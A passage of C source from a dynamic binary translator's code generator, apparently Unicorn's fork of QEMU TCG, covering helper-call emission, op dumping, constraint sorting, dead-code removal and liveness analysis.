TCG_TARGET_HAS_sub2_i64; case INDEX_op_mulu2_i64: return TCG_TARGET_HAS_mulu2_i64; case INDEX_op_muls2_i64: return TCG_TARGET_HAS_muls2_i64; case INDEX_op_muluh_i64: return TCG_TARGET_HAS_muluh_i64; case INDEX_op_mulsh_i64: return TCG_TARGET_HAS_mulsh_i64; case INDEX_op_mov_vec: case INDEX_op_dup_vec: case INDEX_op_dupi_vec: case INDEX_op_dupm_vec: case INDEX_op_ld_vec: case INDEX_op_st_vec: case INDEX_op_add_vec: case INDEX_op_sub_vec: case INDEX_op_and_vec: case INDEX_op_or_vec: case INDEX_op_xor_vec: case INDEX_op_cmp_vec: return have_vec; case INDEX_op_dup2_vec: return have_vec && TCG_TARGET_REG_BITS == 32; case INDEX_op_not_vec: return have_vec && TCG_TARGET_HAS_not_vec; case INDEX_op_neg_vec: return have_vec && TCG_TARGET_HAS_neg_vec; case INDEX_op_abs_vec: return have_vec && TCG_TARGET_HAS_abs_vec; case INDEX_op_andc_vec: return have_vec && TCG_TARGET_HAS_andc_vec; case INDEX_op_orc_vec: return have_vec && TCG_TARGET_HAS_orc_vec; case INDEX_op_mul_vec: return have_vec && TCG_TARGET_HAS_mul_vec; case INDEX_op_shli_vec: case INDEX_op_shri_vec: case INDEX_op_sari_vec: return have_vec && TCG_TARGET_HAS_shi_vec; case INDEX_op_shls_vec: case INDEX_op_shrs_vec: case INDEX_op_sars_vec: return have_vec && TCG_TARGET_HAS_shs_vec; case INDEX_op_shlv_vec: case INDEX_op_shrv_vec: case INDEX_op_sarv_vec: return have_vec && TCG_TARGET_HAS_shv_vec; case INDEX_op_ssadd_vec: case INDEX_op_usadd_vec: case INDEX_op_sssub_vec: case INDEX_op_ussub_vec: return have_vec && TCG_TARGET_HAS_sat_vec; case INDEX_op_smin_vec: case INDEX_op_umin_vec: case INDEX_op_smax_vec: case INDEX_op_umax_vec: return have_vec && TCG_TARGET_HAS_minmax_vec; case INDEX_op_bitsel_vec: return have_vec && TCG_TARGET_HAS_bitsel_vec; case INDEX_op_cmpsel_vec: return have_vec && TCG_TARGET_HAS_cmpsel_vec; default: tcg_debug_assert(op > INDEX_op_last_generic && op < NB_OPS); return true; } } /* Note: we convert the 64 bit args to 32 bit and do some alignment and endian swap. Maybe it would be better to do the alignment and endian swap in tcg_reg_alloc_call(). */ void tcg_gen_callN(TCGContext *tcg_ctx, void *func, TCGTemp *ret, int nargs, TCGTemp **args) { int i, real_args, nb_rets, pi; unsigned sizemask, flags; TCGHelperInfo *info; TCGOp *op; info = g_hash_table_lookup(tcg_ctx->helper_table, (gpointer)func); flags = info->flags; sizemask = info->sizemask; #if defined(__sparc__) && !defined(__arch64__) /* We have 64-bit values in one register, but need to pass as two separate parameters. Split them. */ int orig_sizemask = sizemask; int orig_nargs = nargs; TCGv_i64 retl, reth; TCGTemp *split_args[MAX_OPC_PARAM]; retl = NULL; reth = NULL; if (sizemask != 0) { for (i = real_args = 0; i < nargs; ++i) { int is_64bit = sizemask & (1 << (i+1)*2); if (is_64bit) { TCGv_i64 orig = temp_tcgv_i64(args[i]); TCGv_i32 h = tcg_temp_new_i32(); TCGv_i32 l = tcg_temp_new_i32(); tcg_gen_extr_i64_i32(l, h, orig); split_args[real_args++] = tcgv_i32_temp(h); split_args[real_args++] = tcgv_i32_temp(l); } else { split_args[real_args++] = args[i]; } } nargs = real_args; args = split_args; sizemask = 0; } #elif defined(TCG_TARGET_EXTEND_ARGS) && TCG_TARGET_REG_BITS == 64 for (i = 0; i < nargs; ++i) { int is_64bit = sizemask & (1 << (i+1)*2); int is_signed = sizemask & (2 << (i+1)*2); if (!is_64bit) { TCGv_i64 temp = tcg_temp_new_i64(tcg_ctx); TCGv_i64 orig = temp_tcgv_i64(tcg_ctx, args[i]); if (is_signed) { tcg_gen_ext32s_i64(tcg_ctx, temp, orig); } else { tcg_gen_ext32u_i64(tcg_ctx, temp, orig); } args[i] = tcgv_i64_temp(tcg_ctx, temp); } } #endif /* TCG_TARGET_EXTEND_ARGS */ op = tcg_emit_op(tcg_ctx, INDEX_op_call); pi = 0; if (ret != NULL) { #if defined(__sparc__) && !defined(__arch64__) if (orig_sizemask & 1) { /* The 32-bit ABI is going to return the 64-bit value in the %o0/%o1 register pair. Prepare for this by using two return temporaries, and reassemble below. */ retl = tcg_temp_new_i64(); reth = tcg_temp_new_i64(); op->args[pi++] = tcgv_i64_arg(reth); op->args[pi++] = tcgv_i64_arg(retl); nb_rets = 2; } else { op->args[pi++] = temp_arg(ret); nb_rets = 1; } #else if (TCG_TARGET_REG_BITS < 64 && (sizemask & 1)) { #ifdef HOST_WORDS_BIGENDIAN op->args[pi++] = temp_arg(ret + 1); op->args[pi++] = temp_arg(ret); #else op->args[pi++] = temp_arg(ret); op->args[pi++] = temp_arg(ret + 1); #endif nb_rets = 2; } else { op->args[pi++] = temp_arg(ret); nb_rets = 1; } #endif } else { nb_rets = 0; } TCGOP_CALLO(op) = nb_rets; real_args = 0; for (i = 0; i < nargs; i++) { int is_64bit = sizemask & (1 << (i+1)*2); if (TCG_TARGET_REG_BITS < 64 && is_64bit) { #ifdef TCG_TARGET_CALL_ALIGN_ARGS /* some targets want aligned 64 bit args */ if (real_args & 1) { op->args[pi++] = TCG_CALL_DUMMY_ARG; real_args++; } #endif /* If stack grows up, then we will be placing successive arguments at lower addresses, which means we need to reverse the order compared to how we would normally treat either big or little-endian. For those arguments that will wind up in registers, this still works for HPPA (the only current STACK_GROWSUP target) since the argument registers are *also* allocated in decreasing order. If another such target is added, this logic may have to get more complicated to differentiate between stack arguments and register arguments. */ #if defined(HOST_WORDS_BIGENDIAN) != defined(TCG_TARGET_STACK_GROWSUP) op->args[pi++] = temp_arg(args[i] + 1); op->args[pi++] = temp_arg(args[i]); #else op->args[pi++] = temp_arg(args[i]); op->args[pi++] = temp_arg(args[i] + 1); #endif real_args += 2; continue; } op->args[pi++] = temp_arg(args[i]); real_args++; } op->args[pi++] = (uintptr_t)func; op->args[pi++] = flags; TCGOP_CALLI(op) = real_args; /* Make sure the fields didn't overflow. */ tcg_debug_assert(TCGOP_CALLI(op) == real_args); tcg_debug_assert(pi <= ARRAY_SIZE(op->args)); #if defined(__sparc__) && !defined(__arch64__) /* Free all of the parts we allocated above. */ for (i = real_args = 0; i < orig_nargs; ++i) { int is_64bit = orig_sizemask & (1 << (i+1)*2); if (is_64bit) { tcg_temp_free_internal(args[real_args++]); tcg_temp_free_internal(args[real_args++]); } else { real_args++; } } if (orig_sizemask & 1) { /* The 32-bit ABI returned two 32-bit pieces. Re-assemble them. Note that describing these as TCGv_i64 eliminates an unnecessary zero-extension that tcg_gen_concat_i32_i64 would create. */ tcg_gen_concat32_i64(temp_tcgv_i64(ret), retl, reth); tcg_temp_free_i64(retl); tcg_temp_free_i64(reth); } #elif defined(TCG_TARGET_EXTEND_ARGS) && TCG_TARGET_REG_BITS == 64 for (i = 0; i < nargs; ++i) { int is_64bit = sizemask & (1 << (i+1)*2); if (!is_64bit) { tcg_temp_free_internal(tcg_ctx, args[i]); } } #endif /* TCG_TARGET_EXTEND_ARGS */ } static void tcg_reg_alloc_start(TCGContext *s) { int i, n; TCGTemp *ts; for (i = 0, n = s->nb_globals; i < n; i++) { ts = &s->temps[i]; ts->val_type = (ts->fixed_reg ? TEMP_VAL_REG : TEMP_VAL_MEM); } for (n = s->nb_temps; i < n; i++) { ts = &s->temps[i]; ts->val_type = (ts->temp_local ? TEMP_VAL_MEM : TEMP_VAL_DEAD); ts->mem_allocated = 0; ts->fixed_reg = 0; } memset(s->reg_to_temp, 0, sizeof(s->reg_to_temp)); } /* Find helper name. */ static inline const char *tcg_find_helper(TCGContext *s, uintptr_t val) { const char *ret = NULL; if (s->helper_table) { TCGHelperInfo *info = g_hash_table_lookup(s->helper_table, (gpointer)val); if (info) { ret = info->name; } } return ret; } static char *tcg_get_arg_str_ptr(TCGContext *s, char *buf, int buf_size, TCGTemp *ts) { int idx = temp_idx(s, ts); if (ts->temp_global) { pstrcpy(buf, buf_size, ts->name); } else if (ts->temp_local) { snprintf(buf, buf_size, "loc%d", idx - s->nb_globals); } else { snprintf(buf, buf_size, "tmp%d", idx - s->nb_globals); } return buf; } static char *tcg_get_arg_str(TCGContext *s, char *buf, int buf_size, TCGArg arg) { return tcg_get_arg_str_ptr(s, buf, buf_size, arg_temp(arg)); } static const char * const cond_name[] = { [TCG_COND_NEVER] = "never", [TCG_COND_ALWAYS] = "always", [TCG_COND_EQ] = "eq", [TCG_COND_NE] = "ne", [TCG_COND_LT] = "lt", [TCG_COND_GE] = "ge", [TCG_COND_LE] = "le", [TCG_COND_GT] = "gt", [TCG_COND_LTU] = "ltu", [TCG_COND_GEU] = "geu", [TCG_COND_LEU] = "leu", [TCG_COND_GTU] = "gtu" }; static const char * const ldst_name[] = { [MO_UB] = "ub", [MO_SB] = "sb", [MO_LEUW] = "leuw", [MO_LESW] = "lesw", [MO_LEUL] = "leul", [MO_LESL] = "lesl", [MO_LEQ] = "leq", [MO_BEUW] = "beuw", [MO_BESW] = "besw", [MO_BEUL] = "beul", [MO_BESL] = "besl", [MO_BEQ] = "beq", }; static const char * const alignment_name[(MO_AMASK >> MO_ASHIFT) + 1] = { #ifdef TARGET_ALIGNED_ONLY [MO_UNALN >> MO_ASHIFT] = "un+", [MO_ALIGN >> MO_ASHIFT] = "", #else [MO_UNALN >> MO_ASHIFT] = "", [MO_ALIGN >> MO_ASHIFT] = "al+", #endif [MO_ALIGN_2 >> MO_ASHIFT] = "al2+", [MO_ALIGN_4 >> MO_ASHIFT] = "al4+", [MO_ALIGN_8 >> MO_ASHIFT] = "al8+", [MO_ALIGN_16 >> MO_ASHIFT] = "al16+", [MO_ALIGN_32 >> MO_ASHIFT] = "al32+", [MO_ALIGN_64 >> MO_ASHIFT] = "al64+", }; /* * Unicorn: Utility to dump a single op. */ void tcg_dump_op(TCGContext *s, bool have_prefs, TCGOp* op) { char buf[128]; int i, k, nb_oargs, nb_iargs, nb_cargs; const TCGOpDef *def; TCGOpcode c; c = op->opc; def = &s->tcg_op_defs[c]; if (c == INDEX_op_insn_start) { nb_oargs = 0; fprintf(stderr, " ----"); for (i = 0; i < TARGET_INSN_START_WORDS; ++i) { target_ulong a; #if TARGET_LONG_BITS > TCG_TARGET_REG_BITS a = deposit64(op->args[i * 2], 32, 32, op->args[i * 2 + 1]); #else a = op->args[i]; #endif fprintf(stderr, " " TARGET_FMT_lx, a); } } else if (c == INDEX_op_call) { /* variable number of arguments */ nb_oargs = TCGOP_CALLO(op); nb_iargs = TCGOP_CALLI(op); nb_cargs = def->nb_cargs; /* function name, flags, out args */ fprintf(stderr, " %s %s,$0x%" TCG_PRIlx ",$%d", def->name, tcg_find_helper(s, op->args[nb_oargs + nb_iargs]), op->args[nb_oargs + nb_iargs + 1], nb_oargs); for (i = 0; i < nb_oargs; i++) { fprintf(stderr, ",%s", tcg_get_arg_str(s, buf, sizeof(buf), op->args[i])); } for (i = 0; i < nb_iargs; i++) { TCGArg arg = op->args[nb_oargs + i]; const char *t = "<dummy>"; if (arg != TCG_CALL_DUMMY_ARG) { t = tcg_get_arg_str(s, buf, sizeof(buf), arg); } fprintf(stderr, ",%s", t); } } else { fprintf(stderr, " %s ", def->name); nb_oargs = def->nb_oargs; nb_iargs = def->nb_iargs; nb_cargs = def->nb_cargs; if (def->flags & TCG_OPF_VECTOR) { fprintf(stderr, "v%d,e%d,", 64 << TCGOP_VECL(op), 8 << TCGOP_VECE(op)); } k = 0; for (i = 0; i < nb_oargs; i++) { if (k != 0) { fprintf(stderr, ","); } fprintf(stderr, "%s", tcg_get_arg_str(s, buf, sizeof(buf), op->args[k++])); } for (i = 0; i < nb_iargs; i++) { if (k != 0) { fprintf(stderr, ","); } fprintf(stderr, "%s", tcg_get_arg_str(s, buf, sizeof(buf), op->args[k++])); } switch (c) { case INDEX_op_brcond_i32: case INDEX_op_setcond_i32: case INDEX_op_movcond_i32: case INDEX_op_brcond2_i32: case INDEX_op_setcond2_i32: case INDEX_op_brcond_i64: case INDEX_op_setcond_i64: case INDEX_op_movcond_i64: case INDEX_op_cmp_vec: case INDEX_op_cmpsel_vec: if (op->args[k] < ARRAY_SIZE(cond_name) && cond_name[op->args[k]]) { fprintf(stderr, ",%s", cond_name[op->args[k++]]); } else { fprintf(stderr, ",$0x%" TCG_PRIlx, op->args[k++]); } i = 1; break; case INDEX_op_qemu_ld_i32: case INDEX_op_qemu_st_i32: case INDEX_op_qemu_ld_i64: case INDEX_op_qemu_st_i64: { TCGMemOpIdx oi = op->args[k++]; MemOp op = get_memop(oi); unsigned ix = get_mmuidx(oi); if (op & ~(MO_AMASK | MO_BSWAP | MO_SSIZE)) { fprintf(stderr, ",$0x%x,%u", op, ix); } else { const char *s_al, *s_op; s_al = alignment_name[(op & MO_AMASK) >> MO_ASHIFT]; s_op = ldst_name[op & (MO_BSWAP | MO_SSIZE)]; fprintf(stderr, ",%s%s,%u", s_al, s_op, ix); } i = 1; } break; default: i = 0; break; } switch (c) { case INDEX_op_set_label: case INDEX_op_br: case INDEX_op_brcond_i32: case INDEX_op_brcond_i64: case INDEX_op_brcond2_i32: fprintf(stderr, "%s$L%d", k ? "," : "", arg_label(op->args[k])->id); i++, k++; break; default: break; } for (; i < nb_cargs; i++, k++) { fprintf(stderr, "%s$0x%" TCG_PRIlx, k ? "," : "", op->args[k]); } if(c == INDEX_op_mov_i64){ struct TCGTemp* tp = arg_temp(op->args[1]); if (tp && tp->val_type == TEMP_VAL_MEM){ fprintf(stderr, " mem_base=%p ", tp->mem_base); } } } if (op->life) { unsigned life = op->life; if (life & (SYNC_ARG * 3)) { fprintf(stderr, " sync:"); for (i = 0; i < 2; ++i) { if (life & (SYNC_ARG << i)) { fprintf(stderr, " %d", i); } } } life /= DEAD_ARG; if (life) { fprintf(stderr, " dead:"); for (i = 0; life; ++i, life >>= 1) { if (life & 1) { fprintf(stderr, " %d", i); } } } } if (have_prefs) { for (i = 0; i < nb_oargs; ++i) { TCGRegSet set = op->output_pref[i]; if (i == 0) { fprintf(stderr, " pref="); } else { fprintf(stderr, ","); } if (set == 0) { fprintf(stderr, "none"); } else if (set == MAKE_64BIT_MASK(0, TCG_TARGET_NB_REGS)) { fprintf(stderr, "all"); #ifdef CONFIG_DEBUG_TCG } else if (tcg_regset_single(set)) { TCGReg reg = tcg_regset_first(set); fprintf(stderr, "%s", tcg_target_reg_names[reg]); #endif } else if (TCG_TARGET_NB_REGS <= 32) { fprintf(stderr, "%#x", (uint32_t)set); } else { fprintf(stderr, "%#" PRIx64, (uint64_t)set); } } } fprintf(stderr, "\n"); } #if 0 static gboolean tcg_dump_tb(gpointer key, gpointer value, gpointer data) { TranslationBlock* tb = (TranslationBlock*)value; fprintf(stderr, " TB "TARGET_FMT_lx"->"TARGET_FMT_lx", flag=%x, cflag=%x\n", tb->pc, tb->pc + tb->size, tb->flags, tb->cflags); return false; } #endif #if 0 /* * Utility to iterate tbs for a TCGContext*. */ static void tcg_dump_tbs(TCGContext *s) { fprintf(stderr, " TBs:\n"); tcg_tb_foreach(s, tcg_dump_tb, NULL); fprintf(stderr, "\n"); return; } #endif void tcg_dump_ops(TCGContext *s, bool have_prefs, const char *headline) { TCGOp *op; int insn_idx = 0; int op_idx = 0; fprintf(stderr, "\n*** %s\n", headline); // tcg_dump_tbs(s, tcg_dump_tb, NULL); QTAILQ_FOREACH(op, &s->ops, link) { if (op->opc == INDEX_op_insn_start) { fprintf(stderr, "\n insn_idx=%d", insn_idx); insn_idx++; op_idx = 0; } else { fprintf(stderr, " %d: ", op_idx); } op_idx++; tcg_dump_op(s, have_prefs, op); } } static inline bool tcg_regset_single(TCGRegSet d) { return (d & (d - 1)) == 0; } static inline TCGReg tcg_regset_first(TCGRegSet d) { if (TCG_TARGET_NB_REGS <= 32) { return ctz32(d); } else { return ctz64(d); } } /* we give more priority to constraints with less registers */ static int get_constraint_priority(const TCGOpDef *def, int k) { const TCGArgConstraint *arg_ct; int i, n; arg_ct = &def->args_ct[k]; if (arg_ct->ct & TCG_CT_ALIAS) { /* an alias is equivalent to a single register */ n = 1; } else { if (!(arg_ct->ct & TCG_CT_REG)) return 0; n = 0; for(i = 0; i < TCG_TARGET_NB_REGS; i++) { if (tcg_regset_test_reg(arg_ct->u.regs, i)) n++; } } return TCG_TARGET_NB_REGS - n + 1; } /* sort from highest priority to lowest */ static void sort_constraints(TCGOpDef *def, int start, int n) { int i, j, p1, p2, tmp; for(i = 0; i < n; i++) def->sorted_args[start + i] = start + i; if (n <= 1) return; for(i = 0; i < n - 1; i++) { for(j = i + 1; j < n; j++) { p1 = get_constraint_priority(def, def->sorted_args[start + i]); p2 = get_constraint_priority(def, def->sorted_args[start + j]); if (p1 < p2) { tmp = def->sorted_args[start + i]; def->sorted_args[start + i] = def->sorted_args[start + j]; def->sorted_args[start + j] = tmp; } } } } static void process_op_defs(TCGContext *s) { TCGOpcode op; for (op = 0; op < NB_OPS; op++) { TCGOpDef *def = &s->tcg_op_defs[op]; const TCGTargetOpDef *tdefs; TCGType type; int i, nb_args; if (def->flags & TCG_OPF_NOT_PRESENT) { continue; } nb_args = def->nb_iargs + def->nb_oargs; if (nb_args == 0) { continue; } tdefs = tcg_target_op_def(op); /* Missing TCGTargetOpDef entry. */ tcg_debug_assert(tdefs != NULL); type = (def->flags & TCG_OPF_64BIT ? TCG_TYPE_I64 : TCG_TYPE_I32); for (i = 0; i < nb_args; i++) { const char *ct_str = tdefs->args_ct_str[i]; /* Incomplete TCGTargetOpDef entry. */ tcg_debug_assert(ct_str != NULL); def->args_ct[i].u.regs = 0; def->args_ct[i].ct = 0; while (*ct_str != '\0') { switch(*ct_str) { case '0': case '1': case '2': case '3': case '4': case '5': case '6': case '7': case '8': case '9': { int oarg = *ct_str - '0'; tcg_debug_assert(ct_str == tdefs->args_ct_str[i]); tcg_debug_assert(oarg < def->nb_oargs); tcg_debug_assert(def->args_ct[oarg].ct & TCG_CT_REG); /* TCG_CT_ALIAS is for the output arguments. The input is tagged with TCG_CT_IALIAS. */ def->args_ct[i] = def->args_ct[oarg]; def->args_ct[oarg].ct |= TCG_CT_ALIAS; def->args_ct[oarg].alias_index = i; def->args_ct[i].ct |= TCG_CT_IALIAS; def->args_ct[i].alias_index = oarg; } ct_str++; break; case '&': def->args_ct[i].ct |= TCG_CT_NEWREG; ct_str++; break; case 'i': def->args_ct[i].ct |= TCG_CT_CONST; ct_str++; break; default: ct_str = target_parse_constraint(&def->args_ct[i], ct_str, type); /* Typo in TCGTargetOpDef constraint. */ tcg_debug_assert(ct_str != NULL); } } } /* TCGTargetOpDef entry with too much information? */ tcg_debug_assert(i == TCG_MAX_OP_ARGS || tdefs->args_ct_str[i] == NULL); /* sort the constraints (XXX: this is just an heuristic) */ sort_constraints(def, 0, def->nb_oargs); sort_constraints(def, def->nb_oargs, def->nb_iargs); } } void tcg_op_remove(TCGContext *s, TCGOp *op) { TCGLabel *label; switch (op->opc) { case INDEX_op_br: label = arg_label(op->args[0]); label->refs--; break; case INDEX_op_brcond_i32: case INDEX_op_brcond_i64: label = arg_label(op->args[3]); label->refs--; break; case INDEX_op_brcond2_i32: label = arg_label(op->args[5]); label->refs--; break; default: break; } QTAILQ_REMOVE(&s->ops, op, link); QTAILQ_INSERT_TAIL(&s->free_ops, op, link); s->nb_ops--; } static TCGOp *tcg_op_alloc(TCGContext *s, TCGOpcode opc) { TCGOp *op; if (likely(QTAILQ_EMPTY(&s->free_ops))) { op = tcg_malloc(s, sizeof(TCGOp)); } else { op = QTAILQ_FIRST(&s->free_ops); QTAILQ_REMOVE(&s->free_ops, op, link); } memset(op, 0, offsetof(TCGOp, link)); op->opc = opc; s->nb_ops++; return op; } TCGOp *tcg_emit_op(TCGContext *tcg_ctx, TCGOpcode opc) { TCGOp *op = tcg_op_alloc(tcg_ctx, opc); QTAILQ_INSERT_TAIL(&tcg_ctx->ops, op, link); return op; } TCGOp *tcg_op_insert_before(TCGContext *s, TCGOp *old_op, TCGOpcode opc) { TCGOp *new_op = tcg_op_alloc(s, opc); QTAILQ_INSERT_BEFORE(old_op, new_op, link); return new_op; } TCGOp *tcg_op_insert_after(TCGContext *s, TCGOp *old_op, TCGOpcode opc) { TCGOp *new_op = tcg_op_alloc(s, opc); QTAILQ_INSERT_AFTER(&s->ops, old_op, new_op, link); return new_op; } /* Reachable analysis : remove unreachable code. */ static void reachable_code_pass(TCGContext *s) { TCGOp *op, *op_next; bool dead = false; QTAILQ_FOREACH_SAFE(op, &s->ops, link, op_next) { bool remove = dead; TCGLabel *label; int call_flags; switch (op->opc) { case INDEX_op_set_label: label = arg_label(op->args[0]); if (label->refs == 0) { /* * While there is an occasional backward branch, virtually * all branches generated by the translators are forward. * Which means that generally we will have already removed * all references to the label that will be, and there is * little to be gained by iterating. */ remove = true; } else { /* Once we see a label, insns become live again. */ dead = false; remove = false; /* * Optimization can fold conditional branches to unconditional. * If we find a label with one reference which is preceded by * an unconditional branch to it, remove both. This needed to * wait until the dead code in between them was removed. */ if (label->refs == 1) { TCGOp *op_prev = QTAILQ_PREV(op, link); if (op_prev->opc == INDEX_op_br && label == arg_label(op_prev->args[0])) { tcg_op_remove(s, op_prev); remove = true; } } } break; case INDEX_op_br: case INDEX_op_exit_tb: case INDEX_op_goto_ptr: /* Unconditional branches; everything following is dead. */ dead = true; break; case INDEX_op_call: /* Notice noreturn helper calls, raising exceptions. */ call_flags = op->args[TCGOP_CALLO(op) + TCGOP_CALLI(op) + 1]; if (call_flags & TCG_CALL_NO_RETURN) { dead = true; } break; case INDEX_op_insn_start: /* Never remove -- we need to keep these for unwind. */ remove = false; break; default: break; } if (remove) { tcg_op_remove(s, op); } } } #define TS_DEAD 1 #define TS_MEM 2 #define IS_DEAD_ARG(n) (arg_life & (DEAD_ARG << (n))) #define NEED_SYNC_ARG(n) (arg_life & (SYNC_ARG << (n))) /* For liveness_pass_1, the register preferences for a given temp. */ static inline TCGRegSet *la_temp_pref(TCGTemp *ts) { return ts->state_ptr; } /* For liveness_pass_1, reset the preferences for a given temp to the * maximal regset for its type. */ static inline void la_reset_pref(TCGContext *tcg_ctx, TCGTemp *ts) { *la_temp_pref(ts) = (ts->state == TS_DEAD ? 0 : tcg_ctx->tcg_target_available_regs[ts->type]); } /* Unicorn: for brcond, we should refresh liveness states for TCG globals */ static void la_brcond_end(TCGContext *s, int ng) { int i; for (i = 0; i < ng; i++) { s->temps[i].state |= TS_MEM; } } /* liveness analysis: end of function: all temps are dead, and globals should be in memory. */ static void la_func_end(TCGContext *s, int ng, int nt) { int i; for (i = 0; i < ng; ++i) { s->temps[i].state = TS_DEAD | TS_MEM; la_reset_pref(s, &s->temps[i]); } for (i = ng; i < nt; ++i) { s->temps[i].state = TS_DEAD; la_reset_pref(s, &s->temps[i]); } } /* liveness analysis: end of basic block: all temps are dead, globals and local temps should be in memory. */ static void la_bb_end(TCGContext *s, int ng, int nt) { int i; for (i = 0; i < ng; ++i) { s->temps[i].state = TS_DEAD | TS_MEM; la_reset_pref(s, &s->temps[i]); } for (i = ng; i < nt; ++i) { s->temps[i].state = (s->temps[i].temp_local ? TS_DEAD | TS_MEM : TS_DEAD); la_reset_pref(s, &s->temps[i]); } } /* liveness analysis: sync globals back to memory. */ static void la_global_sync(TCGContext *s, int ng) { int i; for (i = 0; i < ng; ++i) { int state = s->temps[i].state; s->temps[i].state = state | TS_MEM; if (state == TS_DEAD) { /* If the global was previously dead, reset prefs. */ la_reset_pref(s, &s->temps[i]); } } } /* liveness analysis: sync globals back to memory and kill. */ static void la_global_kill(TCGContext *s, int ng) { int i; for (i = 0; i < ng; i++) { s->temps[i].state = TS_DEAD | TS_MEM; la_reset_pref(s, &s->temps[i]); } } /* liveness analysis: note live globals crossing calls. */ static void la_cross_call(TCGContext *s, int nt) { TCGRegSet mask = ~(s->tcg_target_call_clobber_regs); int i; for (i = 0; i < nt; i++) { TCGTemp *ts = &s->temps[i]; if (!(ts->state & TS_DEAD)) { TCGRegSet *pset = la_temp_pref(ts); TCGRegSet set = *pset; set &= mask; /* If the combination is not possible, restart. */ if (set == 0) { set = s->tcg_target_available_regs[ts->type] & mask; } *pset = set; } } } /* Liveness analysis : update the opc_arg_life array to tell if a given input arguments is dead. Instructions updating dead temporaries are removed. */ static void liveness_pass_1(TCGContext *s) { int nb_globals = s->nb_globals; int nb_temps = s->nb_temps; TCGOp *op, *op_prev; TCGRegSet *prefs; int i; prefs = tcg_malloc(s, sizeof(TCGRegSet) * nb_temps); for (i = 0; i < nb_temps; ++i) { s->temps[i].state_ptr = prefs + i; } /* ??? Should be redundant with the exit_tb that ends the TB. */ la_func_end(s, nb_globals, nb_temps); QTAILQ_FOREACH_REVERSE_SAFE(op, &s->ops, link, op_prev) { int nb_iargs, nb_oargs; TCGOpcode opc_new, opc_new2; bool have_opc_new2; TCGLifeData arg_life = 0; TCGTemp *ts; TCGOpcode opc = op->opc; const TCGOpDef *def = &s->tcg_op_defs[opc]; switch (opc) { case INDEX_op_call: { int call_flags; int nb_call_regs; nb_oargs = TCGOP_CALLO(op); nb_iargs = TCGOP_CALLI(op); call_flags = op->args[nb_oargs + nb_iargs + 1]; /* pure functions can be removed if their result is unused */ if (call_flags & TCG_CALL_NO_SIDE_EFFECTS) { for (i = 0; i < nb_oargs; i++) { ts = arg_temp(op->args[i]); if (ts->state != TS_DEAD) { goto do_not_remove_call; } } goto do_remove; } do_not_remove_call: /* Output args are dead. */ for (i = 0; i < nb_oargs; i++) { ts = arg_temp(op->args[i]); if (ts->state & TS_DEAD) { arg_life |= DEAD_ARG << i; } if (ts->state & TS_MEM) { arg_life |= SYNC_ARG << i; } ts->state = TS_DEAD; la_reset_pref(s, ts); /* Not used -- it will be tcg_target_call_oarg_regs[i]. */ op->output_pref[i] = 0; } if (!(call_flags & (TCG_CALL_NO_WRITE_GLOBALS | TCG_CALL_NO_READ_GLOBALS))) { la_global_kill(s, nb_globals); } else if (!(call_flags & TCG_CALL_NO_READ_GLOBALS)) { la_global_sync(s, nb_globals); } /* Record arguments that die in this helper. */ for (i = nb_oargs; i < nb_iargs + nb_oargs; i++) { ts = arg_temp(op->args[i]); if (ts && ts->state & TS_DEAD) { arg_life |= DEAD_ARG << i; } } /* For all live registers, remove call-clobbered prefs. */ la_cross_call(s, nb_temps); nb_call_regs = ARRAY_SIZE(tcg_target_call_iarg_regs); /* Input arguments are live for preceding opcodes. */ for (i = 0; i < nb_iargs; i++) { ts = arg_temp(op->args[i + nb_oargs]); if (ts && ts->state & TS_DEAD) { /* For those arguments that die, and will be allocated * in registers, clear the register set for that arg, * to be filled in below. For args that will be on * the stack, reset to any available reg. */ *la_temp_pref(ts) = (i < nb_call_regs ? 0 : s->tcg_target_available_regs[ts->type]); ts->state &= ~TS_DEAD; } } /* For each input argument, add its input register to prefs. If a temp is used once, this produces a single set bit. */ for (i = 0; i < MIN(nb_call_regs, nb_iargs); i++) { ts = arg_temp(op->args[i + nb_oargs]); if (ts) { tcg_regset_set_reg(*la_temp_pref(ts), tcg_target_call_iarg_regs[i]); } } } break; case INDEX_op_insn_start: break; case INDEX_op_discard: /* mark the temporary as dead */ ts = arg_temp(op->args[0]); ts->state = TS_DEAD; la_reset_pref(s, ts); break; case INDEX_op_add2_i32: opc_new = INDEX_op_add_i32; goto do_addsub2; case INDEX_op_sub2_i32: opc_new = INDEX_op_sub_i32; goto do_addsub2; case INDEX_op_add2_i64: opc_new = INDEX_op_add_i64; goto do_addsub2; case INDEX_op_sub2_i64: opc_new = INDEX_op_sub_i64; do_addsub2: nb_iargs = 4; nb_oargs = 2; /* Test if the high part of the operation is dead, but not the low part. The result can be optimized to a simple add or sub. This happens often for x86_64 guest when the cpu mode is set to 32 bit. */ if (arg_temp(op->args[1])->state == TS_DEAD) { if (arg_temp(op->args[0])->state == TS_DEAD) { goto do_remove; } /* Replace the opcode and adjust the args in place, leaving 3 unused args at the end. */ op->opc = opc = opc_new; op->args[1] = op->args[2]; op->args[2] = op->args[4]; /* Fall through and mark the single-word operation live. */ nb_iargs = 2; nb_oargs = 1; } goto do_not_remove; case INDEX_op_mulu2_i32: opc_new = INDEX_op_mul_i32; opc_new2 = INDEX_op_muluh_i32; have_opc_new2 = TCG_TARGET_HAS_muluh_i32; goto do_mul2; case INDEX_op_muls2_i32: opc_new = INDEX_op_mul_i32; opc_new2 = INDEX_op_mulsh_i32; have_opc_new2 = TCG_TARGET_HAS_mulsh_i32; goto do_mul2; case INDEX_op_mulu2_i64: opc_new = INDEX_op_mul_i64; opc_new2 = INDEX_op_muluh_i64; have_opc_new2 = TCG_TARGET_HAS_muluh_i64; goto do_mul2; case INDEX_op_muls2_i64: opc_new = INDEX_op_mul_i64; opc_new2 = INDEX_op_mulsh_i64; have_opc_new2 = TCG_TARGET_HAS_mulsh_i64; goto do_mul2; do_mul2: nb_iargs = 2; nb_oargs = 2; if (arg_temp(op->args[1])->state == TS_DEAD) { if (arg_temp(op->args[0])->state == TS_DEAD) { /* Both parts of the operation are dead. */ goto do_remove; } /* The high part of the operation is dead; generate the low. */ op->opc = opc = opc_new; op->args[1] = op->args[2]; op->args[2] = op->args[3]; } else if (arg_temp(op->args[0])->state == TS_DEAD && have_opc_new2) { /* The low part of the operation is dead; generate the high. */ op->opc = opc = opc_new2; op->args[0] = op->args[1]; op->args[1] = op->args[2]; op->args[2] = op->args[3]; } else { goto do_not_remove; } /* Mark the single-word operation live. */ nb_oargs = 1; goto do_not_remove; default: /* XXX: optimize by hardcoding common cases (e.g. triadic ops) */ nb_iargs = def->nb_iargs; nb_oargs = def->nb_oargs; /* Test if the operation can be removed because all its outputs are dead. We assume that nb_oargs == 0 implies side effects 